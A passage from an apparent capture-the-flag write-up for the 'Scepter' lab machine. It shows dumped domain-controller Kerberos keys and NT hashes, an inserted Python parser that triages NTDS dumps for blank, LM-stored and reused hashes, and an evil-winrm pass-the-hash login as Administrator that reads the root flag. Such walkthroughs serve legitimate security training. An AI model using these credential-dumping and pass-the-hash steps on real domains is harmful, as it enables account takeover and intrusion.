scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up...
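Added example (not part of the original writeup): a small parser for the secretsdump output above that does the triage a practitioner performs on an NTDS dump before reporting, flagging accounts with a blank password, accounts that still have an LM hash stored, machine accounts and NT hashes shared between accounts (password reuse). The sample input is the dump above plus one constructed line, svc_test, that reuses d.baker's hash so the reuse check has something to find.

```python
import re
from collections import defaultdict

# One secretsdump.py -just-dc credential line: [domain\]account:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?P<account>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # value shown when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_dump(text):
    """Return one dict per credential line; status lines such as '[*] ...' are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            records.append(rec)
    return records


def analyse(records):
    """Flag blank passwords, stored LM hashes, machine accounts and NT hashes shared
    by several accounts, keeping the order in which accounts appear in the dump."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["account"])
    return {
        "blank_password": [r["account"] for r in records if r["nt"] == EMPTY_NT],
        "lm_hash_stored": [r["account"] for r in records if r["lm"] != EMPTY_LM],
        "machine_accounts": [r["account"] for r in records if r["account"].endswith("$")],
        "reused_nt": {h: a for h, a in by_nt.items() if len(a) > 1 and h != EMPTY_NT},
    }


# Sample input: the NTDS lines from the dump above plus one constructed account
# (svc_test) that shares d.baker's NT hash to demonstrate the reuse check.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
scepter.htb\svc_test:2200:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
[*] Kerberos keys grabbed
"""

if __name__ == "__main__":
    for key, value in analyse(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

Blank-password and reused-hash findings go straight into the report; a non-empty LM hash on any account means the domain still stores LM hashes, which should be disabled by policy.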
❯ evil-winrm -i scepter.htb -u administrator -H a291ead3493f9773dc615e66c2ea21c4
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cb7063f998324a7fe9d129f6f6db3d32
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Checking our results with for kali.